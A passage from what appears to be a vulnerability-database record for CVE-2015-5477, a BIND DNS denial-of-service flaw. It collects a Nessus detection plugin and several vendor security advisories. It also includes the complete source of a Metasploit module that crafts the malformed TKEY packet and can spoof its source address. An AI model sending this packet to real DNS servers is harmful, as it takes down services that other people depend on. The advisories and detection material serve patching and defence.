script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9-host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:bind9utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:dnsutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:host\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbind-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libbind9-60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libdns69\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libisc62\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libisccc60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libisccfg62\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:liblwres60\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:lwresd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2020 Tenable Network Security, Inc.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"bind9\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9-doc\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9-host\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"bind9utils\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"dnsutils\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"host\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbind-dev\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libbind9-60\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libdns69\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisc62\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisccc60\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libisccfg62\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"liblwres60\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"lwresd\", reference:\"1:9.7.3.dfsg-1~squeeze16\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2019-12-20T18:29:13", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:1515\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-July/033307.html\n\n**Affected packages:**\nbind97\nbind97-chroot\nbind97-devel\nbind97-libs\nbind97-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1515.html", "modified": "2015-07-29T02:03:50", "published": "2015-07-29T02:03:50", "href": "http://lists.centos.org/pipermail/centos-announce/2015-July/033307.html", "id": "CESA-2015:1515", "title": "bind97 security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:26:57", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:1513\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-July/033306.html\nhttp://lists.centos.org/pipermail/centos-cr-announce/2015-July/008305.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libs\nbind-libs-lite\nbind-license\nbind-lite-devel\nbind-sdb\nbind-sdb-chroot\nbind-utils\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1513.html", "modified": "2015-07-29T01:56:37", "published": "2015-07-29T01:43:33", "href": "http://lists.centos.org/pipermail/centos-announce/2015-July/033306.html", "id": "CESA-2015:1513", "title": "bind security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:29:37", "bulletinFamily": "unix", "description": "**CentOS Errata and Security Advisory** CESA-2015:1514\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2015-July/033308.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-1514.html", "modified": "2015-07-29T02:04:03", "published": "2015-07-29T02:04:03", "href": "http://lists.centos.org/pipermail/centos-announce/2015-July/033308.html", "id": "CESA-2015:1514", "title": "bind, caching security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "metasploit": [{"lastseen": "2020-07-14T03:48:47", "bulletinFamily": "exploit", "description": "This module sends a malformed TKEY query, which exploits an error in handling TKEY queries on affected BIND9 'named' DNS servers. As a result, a vulnerable named server will exit with a REQUIRE assertion failure. This condition can be exploited in versions of BIND between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0 through 9.10.2-P2.\n", "modified": "2018-11-16T18:18:28", "published": "2015-08-01T11:01:35", "id": "MSF:AUXILIARY/DOS/DNS/BIND_TKEY", "href": "", "type": "metasploit", "title": "BIND TKEY Query Denial of Service", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Capture\n include Msf::Auxiliary::UDPScanner\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BIND TKEY Query Denial of Service',\n 'Description' => %q{\n This module sends a malformed TKEY query, which exploits an\n error in handling TKEY queries on affected BIND9 'named' DNS servers.\n As a result, a vulnerable named server will exit with a REQUIRE\n assertion failure. This condition can be exploited in versions of BIND\n between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0\n through 9.10.2-P2.\n },\n 'Author' => [\n 'Jonathan Foote', # Original discoverer\n 'throwawayokejxqbbif', # PoC\n 'wvu' # Metasploit module\n ],\n 'References' => [\n ['CVE', '2015-5477'],\n ['URL', 'https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],\n ['URL', 'https://kb.isc.org/article/AA-01272']\n ],\n 'DisclosureDate' => '2015-07-28',\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => {'ScannerRecvWindow' => 0}\n ))\n\n register_options([\n Opt::RPORT(53),\n OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])\n ])\n\n deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')\n end\n\n def scan_host(ip)\n if datastore['SRC_ADDR']\n scanner_spoof_send(payload, ip, rport, datastore['SRC_ADDR'])\n else\n print_status(\"Sending packet to #{ip}\")\n scanner_send(payload, ip, rport)\n end\n end\n\n def payload\n name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n txt = Rex::Text.rand_text_alphanumeric(rand(42) + 1)\n\n name_length = [name.length].pack('C')\n txt_length = [txt.length].pack('C')\n data_length = [txt.length + 1].pack('n')\n ttl = [rand(2 ** 31 - 1) + 1].pack('N')\n\n query = \"\\x00\\x00\" # Transaction ID: 0x0000\n query << \"\\x00\\x00\" # Flags: 0x0000 Standard query\n query << \"\\x00\\x01\" # Questions: 1\n query << \"\\x00\\x00\" # Answer RRs: 0\n query << \"\\x00\\x00\" # Authority RRs: 0\n query << \"\\x00\\x01\" # Additional RRs: 1\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\xf9\" # Type: TKEY (Transaction Key) (249)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n\n query << name_length # [Name Length]\n query << name # Name\n query << \"\\x00\" # [End of name]\n query << \"\\x00\\x10\" # Type: TXT (Text strings) (16)\n query << \"\\x00\\x01\" # Class: IN (0x0001)\n query << ttl # Time to live\n query << data_length # Data length\n query << txt_length # TXT Length\n query << txt # TXT\n end\nend\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/dos/dns/bind_tkey.rb"}], "debian": [{"lastseen": "2020-07-14T12:51:59", "bulletinFamily": "unix", "description": "Package : bind9\nVersion : 1:9.7.3.dfsg-1~squeeze16\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\n", "modified": "2015-07-28T19:23:55", "published": "2015-07-28T19:23:55", "id": "DEBIAN:DLA-285-1:3629A", "href": "https://lists.debian.org/debian-lts-announce/2015/debian-lts-announce-201507/msg00023.html", "title": "[SECURITY] [DLA 285-1] bind9 security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-07-14T12:48:44", "bulletinFamily": "unix", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3319-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nJuly 28, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : bind9\nCVE ID : CVE-2015-5477\n\nJonathan Foote discovered that the BIND DNS server does not properly\nhandle TKEY queries. A remote attacker can take advantage of this flaw\nto mount a denial of service via a specially crafted query triggering an\nassertion failure and causing BIND to exit.\n\nFor the oldstable distribution (wheezy), this problem has been fixed\nin version 1:9.8.4.dfsg.P1-6+nmu2+deb7u6.\n\nFor the stable distribution (jessie), this problem has been fixed in\nversion 1:9.9.5.dfsg-9+deb8u2.\n\nWe recommend that you upgrade your bind9 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2015-07-28T19:05:25", "published": "2015-07-28T19:05:25", "id": "DEBIAN:DSA-3319-1:36EAC", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00215.html", "title": "[SECURITY] [DSA 3319-1] bind9 security update", "type": "debian", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:45:17", "bulletinFamily": "unix", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "modified": "2017-09-08T12:17:54", "published": "2015-07-28T04:00:00", "id": "RHSA-2015:1514", "href": "https://access.redhat.com/errata/RHSA-2015:1514", "type": "redhat", "title": "(RHSA-2015:1514) Important: bind security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:45:19", "bulletinFamily": "unix", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "modified": "2017-09-08T12:16:32", "published": "2015-07-28T04:00:00", "id": "RHSA-2015:1515", "href": "https://access.redhat.com/errata/RHSA-2015:1515", "type": "redhat", "title": "(RHSA-2015:1515) Important: bind97 security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:46:29", "bulletinFamily": "unix", "description": "The Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n", "modified": "2018-06-06T20:24:18", "published": "2015-07-28T04:00:00", "id": "RHSA-2015:1513", "href": "https://access.redhat.com/errata/RHSA-2015:1513", "type": "redhat", "title": "(RHSA-2015:1513) Important: bind security update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:07", "bulletinFamily": "unix", "description": "\nISC reports:\n\nAn error in the handling of TKEY queries can be exploited\n\t by an attacker for use as a denial-of-service vector, as a constructed\n\t packet can use the defect to trigger a REQUIRE assertion failure,\n\t causing BIND to exit.\n\n", "modified": "2016-08-09T00:00:00", "published": "2015-07-21T00:00:00", "id": "731CDEAA-3564-11E5-9970-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/731cdeaa-3564-11e5-9970-14dae9d210b8.html", "title": "bind -- denial of service vulnerability", "type": "freebsd", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "slackware": [{"lastseen": "2019-05-30T07:37:28", "bulletinFamily": "unix", "description": "New bind packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.1 ChangeLog:\n\npatches/packages/bind-9.9.7_P2-i486-1_slack14.1.txz: Upgraded.\n This update fixes a security issue where an error in the handling of TKEY\n queries can be exploited by an attacker for use as a denial-of-service\n vector, as a constructed packet can use the defect to trigger a REQUIRE\n assertion failure, causing BIND to exit.\n Impact:\n Both recursive and authoritative servers are vulnerable to this defect.\n Additionally, exposure is not prevented by either ACLs or configuration\n options limiting or denying service because the exploitable code occurs\n early in the packet handling, before checks enforcing those boundaries.\n Operators should take steps to upgrade to a patched version as soon as\n possible.\n For more information, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5477\n https://kb.isc.org/article/AA-01272\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the "Get Slack" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/bind-9.9.7_P2-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/bind-9.9.7_P2-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/bind-9.9.7_P2-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/bind-9.9.7_P2-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/bind-9.9.7_P2-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/bind-9.9.7_P2-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/bind-9.9.7_P2-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/bind-9.9.7_P2-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/bind-9.10.2_P3-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/bind-9.10.2_P3-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.0 package:\n6a7f7bbc83fd3d189d1e43f672deb33d bind-9.9.7_P2-i486-1_slack13.0.txz\n\nSlackware x86_64 13.0 package:\n3b8306bfbec7ff968762ab5c38e7d419 bind-9.9.7_P2-x86_64-1_slack13.0.txz\n\nSlackware 13.1 package:\ncfb8dfe797158a769697c261f2e5114c bind-9.9.7_P2-i486-1_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n417b3bb461e5fd5aae6b671fd584a1ae bind-9.9.7_P2-x86_64-1_slack13.1.txz\n\nSlackware 13.37 package:\ndf46b76823c598beb2d0f47f2b6a9813 bind-9.9.7_P2-i486-1_slack13.37.txz\n\nSlackware x86_64 13.37 package:\nb17f5230240b9a0738e2066897b09a40 bind-9.9.7_P2-x86_64-1_slack13.37.txz\n\nSlackware 14.0 package:\nc9f9074c811f470009e6dda97dc5ff68 bind-9.9.7_P2-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n578d63e26fee2783502f0828dc3d491c bind-9.9.7_P2-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n9e27701833bd20df42e25418ffa8fdca bind-9.9.7_P2-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\n4b9c8c11a38c28ca2f12e8f97e3763c6 bind-9.9.7_P2-x86_64-1_slack14.1.txz\n\nSlackware -current package:\nc47d83f7a7b31902e802df3b72d1e902 n/bind-9.10.2_P3-i586-1.txz\n\nSlackware x86_64 -current package:\nc95fcfd95ed0261a2dedee90432f34c7 n/bind-9.10.2_P3-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg bind-9.9.7_P2-i486-1_slack14.1.txz\n\nThen, restart the name server:\n > /etc/rc.d/rc.bind restart", "modified": "2015-07-28T12:38:44", "published": "2015-07-28T12:38:44", "id": "SSA-2015-209-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2015&m=slackware-security.554472", "title": "bind", "type": "slackware", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:37:38", "bulletinFamily": "unix", "description": "[32:9.8.2-0.37.rc1.2]\n- Fix CVE-2015-5477", "modified": "2015-07-29T00:00:00", "published": "2015-07-29T00:00:00", "id": "ELSA-2015-1513", "href": "http://linux.oracle.com/errata/ELSA-2015-1513.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:15", "bulletinFamily": "unix", "description": "[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "modified": "2015-07-29T00:00:00", "published": "2015-07-29T00:00:00", "id": "ELSA-2015-1514", "href": "http://linux.oracle.com/errata/ELSA-2015-1514.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:20", "bulletinFamily": "unix", "description": "[32:9.7.0-21.P2.2]\n- Fix CVE-2015-5477\n[32:9.7.0-21.P2.1]\n- Fix CVE-2014-8500 (#1171972)", "modified": "2015-07-29T00:00:00", "published": "2015-07-29T00:00:00", "id": "ELSA-2015-1515", "href": "http://linux.oracle.com/errata/ELSA-2015-1515.html", "title": "bind97 security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:36:43", "bulletinFamily": "unix", "description": "[30:9.3.6-25.P1.4]\n- Fix CVE-2015-5722\n[30:9.3.6-25.P1.3]\n- Fix CVE-2015-5477\n[30:9.3.6-25.P1.2]\n- Remove files backup after patching (Related: #1171971)\n[30:9.3.6-25.P1.1]\n- Fix CVE-2014-8500 (#1171971)", "modified": "2015-09-03T00:00:00", "published": "2015-09-03T00:00:00", "id": "ELSA-2015-1706", "href": "http://linux.oracle.com/errata/ELSA-2015-1706.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "aix": [{"lastseen": "2020-04-22T00:52:15", "bulletinFamily": "unix", "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Thu Aug 13 10:35:36 CDT 2015\n|Updated: Mon Aug 17 09:11:49 CDT 2015\n|Update: Added AIX 5.3 vulnerability information\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\nhttps://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\nftp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\n\n\nSecurity Bulletin: Vulnerability in BIND affects AIX (CVE-2015-5477)\n\n\n===============================================================================\n\nSUMMARY:\n\n BIND vulnerability disclosed by Internet Systems Consortium (ISC) affects\n AIX. AIX has addressed this CVE.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2015-5477\n DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by an\n error in the handling of TKEY queries. By sending specially-crafted\n packets, a remote attacker could exploit this vulnerability to cause a\n REQUIRE assertion failure.\n CVSS Base Score: 7.5\n CVSS Temporal Score: See\n \u00a0https://exchange.xforce.ibmcloud.com/vulnerabilities/105120\u00a0for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n| AIX 5.3, 6.1, 7.1\n VIOS 2.2.x\n\n The following AIX fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n| bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs \n bos.net.tcp.client 6.1.0.0 6.1.8.19 key_w_fs\n bos.net.tcp.client 6.1.0.0 6.1.9.45 key_w_fs\n bos.net.tcp.client 7.1.0.0 7.1.2.19 key_w_fs\n bos.net.tcp.client 7.1.0.0 7.1.3.45 key_w_fs\n\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ------------------------------------------------------------\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.8.19(2.2.2.6)\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.9.45(2.2.3.50)\n\n\n Note: to find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client\n\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR Availability SP KEY\n ---------------------------------------------------\n 6.1.9 IV75692 12/04/15 SP6 key_w_apar\n 7.1.3 IV75693 2/26/16 SP6 key_w_apar\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV75692\n http://www.ibm.com/support/docview.wss?uid=isg1IV75693\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. The fixes can be downloaded via ftp or http\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar\n http://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar\n https://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n ------------------------------------------------\n| 5.3.12.9 IV75966s9a.150813.epkg.Z 